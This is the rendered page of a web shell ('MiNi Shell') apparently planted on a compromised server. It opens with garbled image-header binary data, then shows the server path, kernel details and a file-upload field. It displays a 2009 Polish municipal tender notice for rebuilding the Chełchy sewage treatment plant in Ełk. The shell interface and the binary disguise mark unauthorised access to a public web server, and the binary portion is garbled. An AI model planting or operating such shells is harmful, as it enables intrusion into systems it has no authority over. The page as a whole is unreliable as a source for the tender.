JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090901/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090901/144915-N-2009.html

<p class="kh_header"><b>Ełk: Odtworzenie Linii Technologicznej Oczyszczalni Ścieków Chełchy Gmina Ełk</b><br>
<b>Numer ogłoszenia: 144915 - 2009; data zamieszczenia: 01.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Ełku , ul. Armii Krajowej 3, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6104437, faks 087 6103762.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.elk.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odtworzenie Linii Technologicznej Oczyszczalni Ścieków Chełchy Gmina Ełk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia:
1)Demontaż istniejącego układu oczyszczania ścieków w budynku głównym oczyszczalni ścieków. Zdemontowane urządzenia, zbiorniki, rurociągi, przewody, kable, armatura, części betonowe  - należy poddać utylizacji siłami Wykonawcy.
2)Wykonanie czynności remontowo - budowlanych niezbędnych dla prawidłowego montażu urządzeń technologicznych (fundamenty, pomosty obsługi technicznej, schody, barierki zabezpieczające posadzki.
3)Montaż kompletnej instalacji oczyszczania ścieków z uwzględnieniem niezbędnych elementów armatury, podłączeń instalacyjnych wodociągowych i kanalizacyjnych, elektroenergetycznych, aparatury kontrolno pomiarowej i automatyki, wentylacji, przyłączenia do istniejącego układu pompowego w komorze zbiornika wstępnego - podziemnego, a w szczególności:
demontaż istniejących urządzeń  - zbiornik stalowy
demontaż pomostu technologicznego
demontaż dmuchaw
demontaż rurociągów
demontaż elementów instalacji elektrycznej i wentylacyjnej
montaż reaktorów SBR  o pojemności V=10 m3  - szt. 2
montaż zbiornika STO  o pojemności V=10 m3 szt. 1 
montaż dmuchaw do napowietrzania reaktorów - szt.2
montaż dmuchawy do napowietrzania zbiornika STO - szt. 1.
Montaż rurociągów i armatury 
Montaż pompy osadu nadmiernego
Modernizacja szafy sterowniczej i AKPiA
Wykonanie niezbędnych prac elektrycznych, umożliwiających prawidłową pracę i sterowanie zamontowanymi urządzeniami
Montaż grzejników elektrycznych
Opracowanie nowej instrukcji obsługi oczyszczalni uwzględniającej zamontowane urządzenia. 

1.1.Wykonawca zobowiązany jest do:

1)	Opracowania dokumentacji technicznej wykonawczej zawierającej szczegóły linii technologicznej procesu oczyszczania ścieków, niezbędne obliczenia konstrukcyjne posadowienia urządzeń, zbiorników, pomp, sprężarek i innych. Dokumentacja powinna być opracowana w branży sanitarnej, budowlanej i elektrycznej. Stopień szczegółowości opracowania powinien umożliwiać ocenę zastosowanych rozwiązań technicznych pod względem rodzaju zastosowanych materiałów i zgodności z wytycznymi, zawartymi w załączniku nr 1a do SIWZ.
2)	Terminowego wykonania robót zgodnie z harmonogramem uzgodnionym z Zamawiającym, stanowiącym załącznik do umowy.
3)	Opracowania planu BIOZ i dostarczenia oświadczenia o przyjęciu obowiązków Kierownika Budowy
4)	Wykonania przedmiotu zamówienia  zgodnie z obowiązującym prawem budowlanym, obowiązującymi normami i sztuką budowlaną, przy pomocy osób posiadających odpowiednie kwalifikacje,   przeszkolonych w zakresie BHP i PPOŻ oraz wyposażonych w odpowiedni sprzęt, narzędzia  i odzież.
5)	Zapewnienia nadzoru technicznego nad realizowanym zadaniem przez osoby posiadające  ważne zaświadczenia z właściwej Izby Inżynierów.
6)	 Zapewnienia obsługi geodezyjnej i inwentaryzacji powykonawczej przedmiotu zamówienia
7)	Dokonania uzgodnień szczegółowych z Zamawiającym wynikających z adaptacji zaproponowanej technologii oczyszczania ścieków do warunków lokalnych.
8)	Zabezpieczenia terenu przed dostępem osób nieupoważnionych.
9)	Zabezpieczenia elementów zagospodarowania terenu, budynku, materiałów, istniejących i realizowanych instalacji i urządzeń przed uszkodzeniem w trakcie robót.
10)Wykonania przedmiotu zamówienia z materiałów posiadających aktualne aprobaty techniczne, wynikające z ustawy z dnia 07.07.1994 Prawo Budowlane ( Dz.U. 1994 nr 89  poz. 414  z późniejszymi zmianami) oraz ustawy z dnia 16.04.2004 o wyrobach budowlanych ( Dz.U. 2004.92.881 z dnia 30 kwietnia 2004r )
11)wyroby przeznaczone do instalacji wodociągowej powinny posiadać atesty higieniczne do kontaktu z wodą wystawione przez Państwowy Zakład Higieny.
12)Przygotowania właściwej dokumentacji odbioru końcowego robót, pozwalającej na ocenę  należytego wykonania robót. 
13)Wykonania prób technicznych i rozruchu technologicznego z udziałem Zamawiającego.
14)Zlecenia badań laboratoryjnych składu ścieków surowych i oczyszczonych po uruchomieniu kompletnej instalacji oczyszczalni ścieków, w celu ustalenia skuteczności oczyszczania ścieków 
15)Przejęcia  pełnej odpowiedzialności za szkody i następstwa wypadków dotyczących pracowników i osób trzecich przebywających w rejonie prowadzonych robót, szkody wynikające ze zniszczenia oraz innych zdarzeń losowych w odniesieniu do robót, obiektów,  materiałów, sprzętu i innego mienia ruchomego związanego z prowadzeniem robót podczas realizacji  przedmiotu zamówienia.
16)Powiadomienia na piśmie Zamawiającego o gotowości do odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.22.00-0, 45.33.20.00-1, 45.33.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 2 000 zł (słownie złotych: dziesięć tysięcy. złotych).

1.Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
2.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
3.Wadium w pieniądzu należy wpłacić na nr konta 54 9331 0004 0000 0010 9080 0004 Bank Spółdzielczy w Ełku, z dopiskiem: Wadium w przetargu nr ZP.3441.17.2009- Odtworzenie linii technologicznej oczyszczalni ścieków Chełchy, Gmina Ełk. 
4.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Gminy Ełk  w kancelarii pok. nr 1. lub dołączyć do oferty.
6.Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Warunki udziału w postępowaniu.

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone   w art. 22 ust. 1 ustawy - Pzp, tj.:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 Ustawy-Pzp.





2.Wykonawcy ubiegający się wspólnie o udzielenie zamówienia.

1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2)	W przypadku, o którym mowa w pkt. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnik zwraca się do zamawiającego z wszelkimi sprawami i do niego zamawiający kieruje informacje, korespondencję itp. W przypadku gdy wykonawcy ustanawia pełnomocnika, zobowiązany jest dołączyć do oferty dokument potwierdzający ustanowienie pełnomocnictwa.
3)	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w pkt. 1.  
4)	Jeżeli oferta wykonawców o których mowa w pkt. 1 została wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, dostarczenia umowy regulującej  współpracę tych wykonawców, która będzie zawierała co najmniej:
a) zobowiązanie do realizacji  wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz ich solidarną odpowiedzialność za wykonanie zamówienia,
b)   określenie zakresu działania poszczególnych stron umowy,
c)  czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.
Dokument należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
5)Wykonawcy, o których mowa w pkt. 1 ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.

3.Sposób dokonania oceny spełnienia warunków udziału w postępowaniu.

Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń, wymaganych w dziale 6 SIWZ - zgodnie z formułą spełnia - nie spełnia. Zamawiający w trakcie ww. oceny będzie brał pod uwagę jedynie dokumenty i oświadczenia, których wymagał w SIWZ na potwierdzenie spełniania postawionych warunków. W przypadku złożenia przez Wykonawcę oświadczenia lub dokumentu, zawierającego informację, że Wykonawca nie spełnia warunku udziału w postępowaniu lub nie złożenia przez Wykonawcę dokumentu potwierdzającego spełnianie warunku udziału w postępowaniu Zamawiający, z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych uzna, że Wykonawca warunku nie spełnia i wykluczy go z udziału w postępowaniu o czym zamawiający zawiadomi niezwłocznie wykluczonego wykonawcę podając uzasadnienie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełnienia warunków udziału w postępowaniu określonych w niniejszej specyfikacji istotnych warunków zamówienia, Wykonawcy złożą następujące dokumenty i oświadczenia:
1)Oświadczenie Wykonawcy o spełnieniu warunków art. 22 ust. 1 ustawy - Prawo zamówień  publicznych - załącznik nr 1 do SIWZ 

2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania oferty. 

3)Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

4)Aktualne zaświadczenie właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 


5)Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania  o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - minimum jednego zamówienia - w tym okresie odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, Zamawiający przyjmuje, że będzie to realizacja co najmniej: 1 zadania ktorego przedmiotem była: modernizacja lub budowa oczyszczalni ścieków o przepustowości min. 20 m3d oparta na technologii osadu czynnego oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie ( listy referencyjne lub protokoły bezusterkowego odbioru robot)- zał. nr 7 do SIWZ


6)Oświadczenie w sprawie podjęcia obowiązków przez kierownika robót - zał. nr 6  do SIWZ
Kierownik Budowy - powinien posiadać co najmniej 5 letnie doświadczenie zawodowe oraz  co najmniej 5 lat doświadczenia w wykonywaniu podobnych prac, wpisanego na listę członków  izby samorządu zawodowego, posiadającego  ubezpieczenie od odpowiedzialności cywilnej i uprawnienia budowlane  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej  obowiązujących przepisów. Przez prace podobne, o których mowa w poprzednim zdaniu należy rozumieć prace w zakresie:  sieci wodociągowych, kanalizacyjnych, cieplnych.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: wykaz osób sporządzony według wzoru stanowiącego załącznik nr 5 do niniejszej SIWZ oraz  dokumenty potwierdzające, że wskazane osoby posiadają  wymagane kwalifikacje, doświadczenie oraz uprawnienia.

Do oświadczenia należy dołączyć:
czytelną kserokopię uprawnień do pełnienia samodzielnych funkcji technicznych w specjalności instalacyjnej zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
czytelną kserokopię aktualnego zaświadczenia o przynależności do właściwej Izby Samorządu Zawodowego, 
czytelną kserokopię decyzji lub zaświadczenia o wpisie do centralnego rejestru osób posiadających uprawnienia budowlane prowadzonego przez Głównego Inspektora Nadzoru Budowlanego (dotyczy tylko tych osób, które uzyskały uprawnienia budowlane po dniu 14 lutego 1995 roku)


7)Wykonawca dołączy polisę lub inny dokument potwierdzający, że wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczeniową nie niższą niż 200.000,00 zł.

8)Parafowany przez osobę upoważnioną-wzór umowy- zał. nr 8 do SIWZ


Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej   
Polskiej zamiast dokumentu, o którym mowa powyżej, składa dokument  wystawiony w terminie  i  formie określonej w  § 2 Rozporządzenia  Prezesa   Rady Ministrów z dnia 19 maja 2006 r., w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich dokumenty te maja być składane.
Dokumenty składane w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Kopia tłumaczenia musi być poświadczona wg poniższych zasad.

Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokutemu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.

Pełnomocnicy działający w imieniu Wykonawcy muszą wykazać swoje umocowanie do działania. Pełnomocnictwo legitymuje pełnomocnika do wykonywania czynności prawnych w imieniu mocodawcy zatem jego zakres i okres obowiązywania powinien być wyraźnie i precyzyjnie określony.
Pełnomocnictwo winno być dołączone do oferty w oryginale lub kopii uwierzytelnionej przez Mocodawcę lub notariusza. Przyjmuje się, że udzielone pełnomocnictwo upoważnia do poświadczenia kopii innych dokumentów składanych wraz ofertą, z wyłączeniem pełnomocnictwa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.elk.gmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ełk
Armii Krajowej 3
19-300 
pok. nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 09:00, miejsce: Urząd Gminy Ełk
Armii Krajowej 3
19-300 
pok. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com